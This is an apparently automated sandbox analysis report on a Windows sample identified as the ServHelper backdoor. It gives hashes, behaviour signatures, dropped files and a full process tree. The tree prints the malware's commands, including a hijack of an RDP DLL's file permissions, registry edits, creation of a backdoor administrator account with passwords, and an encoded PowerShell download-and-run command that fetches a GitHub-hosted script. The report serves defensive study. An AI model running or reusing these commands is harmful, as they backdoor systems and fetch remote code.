Analysis
-
max time kernel
275s -
max time network
274s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
08-06-2021 15:58
General
-
Target
2fd6796fd158c93b14654240533511af6fec03e5.exe
-
Size
6.0MB
-
MD5
20f307c716a689f4afa3a76b7143db22
-
SHA1
2fd6796fd158c93b14654240533511af6fec03e5
-
SHA256
3647e2dc4336b2eeb828371821c706a329dce645cb16f9c1c31c3faeae8f56dd
-
SHA512
0a8d1b2d0cbd3860df907eb692aa2d775f021822b4d856c051d84e8056a2c1cf893bab68f471b69db0615341dd2dfe78dfac1b79d2239217cfbdf71bfb84061b
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 1 IoCs
-
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
-
Sets DLL path for service in the registry 2 TTPs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Loads dropped DLL 2 IoCs
-
Modifies file permissions 1 TTPs 8 IoCs
-
Drops file in System32 directory 1 IoCs
-
Drops file in Windows directory 21 IoCs
-
Modifies data under HKEY_USERS 4 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
-
Suspicious behavior: LoadsDriver 10 IoCs
-
Suspicious use of AdjustPrivilegeToken 18 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\2fd6796fd158c93b14654240533511af6fec03e5.exe"C:\Users\Admin\AppData\Local\Temp\2fd6796fd158c93b14654240533511af6fec03e5.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\quvybpwk\quvybpwk.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2A8A.tmp" "c:\Users\Admin\AppData\Local\Temp\quvybpwk\CSC56DA61006F16496BB2F43BB772A92.TMP"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
-
C:\Windows\system32\net.exenet start TermService5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵
-
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc qRDuCVgi /add1⤵
-
C:\Windows\system32\net.exenet.exe user wgautilacc qRDuCVgi /add2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc qRDuCVgi /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc qRDuCVgi1⤵
-
C:\Windows\system32\net.exenet.exe user wgautilacc qRDuCVgi2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc qRDuCVgi3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C net user wgautilacc 12341⤵
-
C:\Windows\system32\net.exenet user wgautilacc 12342⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 12343⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0d6a441b-e780-470e-8253-45d742483105MD5
d89968acfbd0cd60b51df04860d99896
SHA1b3c29916ccb81ce98f95bbf3aa8a73de16298b29
SHA2561020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9
SHA512b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_294ff223-dcd9-45ee-9562-7c041fcdb847MD5
a70ee38af4bb2b5ed3eeb7cbd1a12fa3
SHA181dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9
SHA256dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d
SHA5128c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3b4dddbe-b5a2-42ba-99fe-ae51da175df8MD5
faa37917b36371249ac9fcf93317bf97
SHA1a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4
SHA256b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132
SHA512614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8dbbc8da-a6cb-4e65-a556-94b010a555eaMD5
6f0d509e28be1af95ba237d4f43adab4
SHA1c665febe79e435843553bee86a6cea731ce6c5e4
SHA256f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e
SHA5128dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9e67cbd0-0f4d-4024-8bb8-b943915c31f8MD5
e5b3ba61c3cf07deda462c9b27eb4166
SHA1b324dad73048be6e27467315f82b7a5c1438a1f9
SHA256b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925
SHA512a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a0fc6bab-df78-4e68-8e58-49bc9aae98f6MD5
7f79b990cb5ed648f9e583fe35527aa7
SHA171b177b48c8bd745ef02c2affad79ca222da7c33
SHA256080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683
SHA51220926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a12c8e41-858a-444d-80bb-48eb27540246MD5
2d5cd190b5db0620cd62e3cd6ba1dcd3
SHA1ff4f229f4fbacccdf11d98c04ba756bda80aac7a
SHA256ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d
SHA512edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
15c192b7eed2f8442373b826eb0a5deb
SHA1ba48f5f7d1e9e389f3e32ec4199383347f8ac372
SHA256560a94765dadf499c6b62607c4a6e2745aa9bdf58a1e7c15fdab2779104596b6
SHA5126b14e51e210a5f9998e4f3c31cdcd468ad12782882405310429b9f75490eda116aafc2c3fc1bffb1695f29e49063a58962abcf5fc8e487c451d09d7dc66fd6b2
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
70da352ebc6b9b346b959feef73304d1
SHA13959a31c16dcb2ac3718f93c7ff0b5eb682290ad
SHA25614a608d388b06e3b18c2adb65c1c99f69809f83826156b39ae8bd72dbe65e4cd
SHA512e84d48cb1c9b953de2afe44c4392063765ead64392280a7d5ccddf01f19e87639321743c5da750b154bc70a2019a856fa8f374e6712e66346e44588f518b4a7a
-
C:\Users\Admin\AppData\Local\Temp\RES2A8A.tmpMD5
cc97b0adb78db5c6b3ba7057101b1e88
SHA10298cd1075b72025132477458ca0688eb11be668
SHA256de156e82df093d911937a249c2e22c3e0e2ea37d3bf1da2eb63b16d5c1935ed0
SHA5124055469686c64abbf7386c830382eab886cb6428c2c9e34fd31d2b67a46be2e180fca4b2de56277de7d3d68a3b62fc2f886e88a78bb864da1a27d96528037f62
-
C:\Users\Admin\AppData\Local\Temp\quvybpwk\quvybpwk.dllMD5
7a4faafa5a78263d623315383fb5ca73
SHA13c52e8cff44b6fea4a5267c9a2d53150f2c96433
SHA256d8eb45843d3201bcc4e00f87bb452ac67e36f5046844ceab398803a97570490f
SHA5123109cddcd55410cef61ba270e538e5bb8b2d37909aa87ced0d4b9c7633d30cb2044e5209f78c7c0e6f698b88056fb592b9c0d99fb44970db7027d7a39d72eab1
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
3447df88de7128bdc34942334b2fab98
SHA1519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA2569520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA5122ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1MD5
920b50692e0e9c4e32c79f89fafce0c4
SHA14cb71db2bb05daa4e84c649b6c58cbfd20c8e484
SHA25685fda9140e2356752f4139c674b78e36e4bb5da57b7cff27d8db357a4357deaf
SHA512966f23d6366c0a901114e84e64e9d209e77f1de6e40e93ad7d55047732b4ba213fdac8f05cd21cebfe11a0bab79e2cc95739fa3c6eb0eafc917568a7168c7d86
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
382959ef7b4f5d1c2994e8ed4dc609ea
SHA1aaca06a7e7e2588120f8c8513d3983d80a8f3d21
SHA256155f99f5becbf71e414d89195e7f0cdf9be959943f41f63c048274f67006f5a1
SHA512b507d40a364b8e24af7a88a8c498f08e128a183a8953084839736b9011e7857045c570c351f21d3684b42b39656c61e22464a3ec0df5b6bb51ffa35191f3ca0f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
382959ef7b4f5d1c2994e8ed4dc609ea
SHA1aaca06a7e7e2588120f8c8513d3983d80a8f3d21
SHA256155f99f5becbf71e414d89195e7f0cdf9be959943f41f63c048274f67006f5a1
SHA512b507d40a364b8e24af7a88a8c498f08e128a183a8953084839736b9011e7857045c570c351f21d3684b42b39656c61e22464a3ec0df5b6bb51ffa35191f3ca0f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
382959ef7b4f5d1c2994e8ed4dc609ea
SHA1aaca06a7e7e2588120f8c8513d3983d80a8f3d21
SHA256155f99f5becbf71e414d89195e7f0cdf9be959943f41f63c048274f67006f5a1
SHA512b507d40a364b8e24af7a88a8c498f08e128a183a8953084839736b9011e7857045c570c351f21d3684b42b39656c61e22464a3ec0df5b6bb51ffa35191f3ca0f
-
C:\Windows\system32\rfxvmt.dllMD5
dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
\??\PIPE\lsarpcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\lsarpcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\c:\Users\Admin\AppData\Local\Temp\quvybpwk\CSC56DA61006F16496BB2F43BB772A92.TMPMD5
7a31a36e895f3debdc5dba3a26a8ae06
SHA1238449e516bb873e9b6c766ff09cf9361c0322b9
SHA2568719b164e9163c4c5ddb46a7d7aa985aab5d8dc62b85d6661a17734a753832a8
SHA5126499736bf8fac26fd6ac3c1858e2429878e85efba744d8b272bfc1318ecf28343b69f3fe1b148e0b1168b9b7f3b24cfbfe3e8a78677601bf8ef78217c988be81
-
\??\c:\Users\Admin\AppData\Local\Temp\quvybpwk\quvybpwk.0.csMD5
4864fc038c0b4d61f508d402317c6e9a
SHA172171db3eea76ecff3f7f173b0de0d277b0fede7
SHA2560f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA5129e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
\??\c:\Users\Admin\AppData\Local\Temp\quvybpwk\quvybpwk.cmdlineMD5
4dd92674290c3533e6cf45c26629920e
SHA167edf218f1d426564ade6ff4038eca61e5959604
SHA2564f18f896735c8aa9de9265b614dc36ba3a40a8d8ea2bf0e79747624a36cf2976
SHA5120a5a9343b50740cd9f27b6ee616fb70cddfd01c5c203f40129845dca0ff9a4ddf30484738f452c74b28b4a6b46df46224922c99462380f2033595ba5e82e6e74
-
\Windows\Branding\mediasrv.pngMD5
96a6c5d47b0670a98699b2b424e2e65e
SHA157a31831c368efd82801f94a1b72c7230f4288be
SHA256bba6c1f56f0b7f40778d8e862aba528160e02890bb0313dfe1f934e4aafca05f
SHA512b3107141bc206c12afc80c673463288057d6d302c44b568746af5e530f214c5e136ca7edb07c70afa0b6abd6720e7cd4917a4cdd6c82c7d3d5528b76222e6c55
-
\Windows\Branding\mediasvc.pngMD5
a3da4eee0a06c45c5bec80fd959ad539
SHA1a8d2d3691af2e1af85ed8947347d0981017b7a32
SHA2568a7fc19bdb25f16870854c72f936ed9598ffefc4da506bad61e13a890acfae9c
SHA5128d3dcf7d05930b390f8c8928d8910c0b8aa19604d195c8ab4001b73a4866ad4adabc772bee9a391433c2946eeb427f4f1e08092ee8dc7056fe45a1db035e822b
-
memory/108-174-0x0000000000000000-mapping.dmp
-
memory/108-186-0x0000000000000000-mapping.dmp
-
memory/328-161-0x0000000000000000-mapping.dmp
-
memory/328-176-0x0000000000000000-mapping.dmp
-
memory/368-75-0x0000000000000000-mapping.dmp
-
memory/412-165-0x0000000000000000-mapping.dmp
-
memory/472-162-0x0000000000000000-mapping.dmp
-
memory/528-129-0x0000000002690000-0x0000000002691000-memory.dmpFilesize
4KB
-
memory/528-127-0x000000001AD30000-0x000000001AD32000-memory.dmpFilesize
8KB
-
memory/528-78-0x0000000000000000-mapping.dmp
-
memory/528-134-0x0000000001FA0000-0x0000000001FA1000-memory.dmpFilesize
4KB
-
memory/528-133-0x000000001AA60000-0x000000001AA61000-memory.dmpFilesize
4KB
-
memory/528-131-0x000000001AC80000-0x000000001AC81000-memory.dmpFilesize
4KB
-
memory/528-128-0x000000001AD34000-0x000000001AD36000-memory.dmpFilesize
8KB
-
memory/528-121-0x0000000000000000-mapping.dmp
-
memory/544-200-0x0000000000000000-mapping.dmp
-
memory/544-197-0x0000000000000000-mapping.dmp
-
memory/764-190-0x0000000000000000-mapping.dmp
-
memory/764-106-0x000000001B580000-0x000000001B581000-memory.dmpFilesize
4KB
-
memory/764-97-0x000000001AA80000-0x000000001AA81000-memory.dmpFilesize
4KB
-
memory/764-163-0x0000000000000000-mapping.dmp
-
memory/764-93-0x000000001ABF0000-0x000000001ABF2000-memory.dmpFilesize
8KB
-
memory/764-87-0x0000000000000000-mapping.dmp
-
memory/764-99-0x000000001AB80000-0x000000001AB81000-memory.dmpFilesize
4KB
-
memory/764-120-0x000000001B670000-0x000000001B671000-memory.dmpFilesize
4KB
-
memory/764-94-0x000000001ABF4000-0x000000001ABF6000-memory.dmpFilesize
8KB
-
memory/764-95-0x00000000024D0000-0x00000000024D1000-memory.dmpFilesize
4KB
-
memory/764-119-0x000000001B660000-0x000000001B661000-memory.dmpFilesize
4KB
-
memory/764-100-0x0000000002440000-0x0000000002441000-memory.dmpFilesize
4KB
-
memory/820-201-0x0000000000000000-mapping.dmp
-
memory/820-207-0x0000000019564000-0x0000000019566000-memory.dmpFilesize
8KB
-
memory/820-191-0x0000000000000000-mapping.dmp
-
memory/820-206-0x0000000019560000-0x0000000019562000-memory.dmpFilesize
8KB
-
memory/820-185-0x0000000000000000-mapping.dmp
-
memory/820-208-0x000000001956A000-0x0000000019589000-memory.dmpFilesize
124KB
-
memory/948-149-0x000000001A9D0000-0x000000001A9D2000-memory.dmpFilesize
8KB
-
memory/948-150-0x000000001A9D4000-0x000000001A9D6000-memory.dmpFilesize
8KB
-
memory/948-143-0x0000000000000000-mapping.dmp
-
memory/972-166-0x0000000000000000-mapping.dmp
-
memory/972-198-0x0000000000000000-mapping.dmp
-
memory/972-211-0x0000000000000000-mapping.dmp
-
memory/1052-188-0x0000000000000000-mapping.dmp
-
memory/1096-178-0x0000000000000000-mapping.dmp
-
memory/1144-199-0x0000000000000000-mapping.dmp
-
memory/1236-171-0x0000000000000000-mapping.dmp
-
memory/1428-194-0x0000000000000000-mapping.dmp
-
memory/1428-212-0x0000000000000000-mapping.dmp
-
memory/1488-169-0x0000000000000000-mapping.dmp
-
memory/1504-175-0x0000000000000000-mapping.dmp
-
memory/1504-159-0x0000000000000000-mapping.dmp
-
memory/1540-177-0x0000000000000000-mapping.dmp
-
memory/1604-179-0x0000000000000000-mapping.dmp
-
memory/1604-210-0x0000000000000000-mapping.dmp
-
memory/1616-168-0x0000000000000000-mapping.dmp
-
memory/1632-167-0x0000000000000000-mapping.dmp
-
memory/1640-209-0x0000000000000000-mapping.dmp
-
memory/1688-64-0x0000000028567000-0x0000000028568000-memory.dmpFilesize
4KB
-
memory/1688-63-0x0000000028566000-0x0000000028567000-memory.dmpFilesize
4KB
-
memory/1688-61-0x0000000028562000-0x0000000028564000-memory.dmpFilesize
8KB
-
memory/1688-59-0x0000000041510000-0x0000000041931000-memory.dmpFilesize
4.1MB
-
memory/1688-62-0x0000000028564000-0x0000000028566000-memory.dmpFilesize
8KB
-
memory/1808-170-0x0000000000000000-mapping.dmp
-
memory/1840-196-0x0000000000000000-mapping.dmp
-
memory/1868-180-0x0000000000000000-mapping.dmp
-
memory/1868-164-0x0000000000000000-mapping.dmp
-
memory/1880-173-0x0000000000000000-mapping.dmp
-
memory/1936-189-0x0000000000000000-mapping.dmp
-
memory/1936-183-0x0000000000000000-mapping.dmp
-
memory/1964-172-0x0000000000000000-mapping.dmp
-
memory/1972-184-0x0000000000000000-mapping.dmp
-
memory/1972-193-0x0000000000000000-mapping.dmp
-
memory/2028-67-0x0000000002260000-0x0000000002261000-memory.dmpFilesize
4KB
-
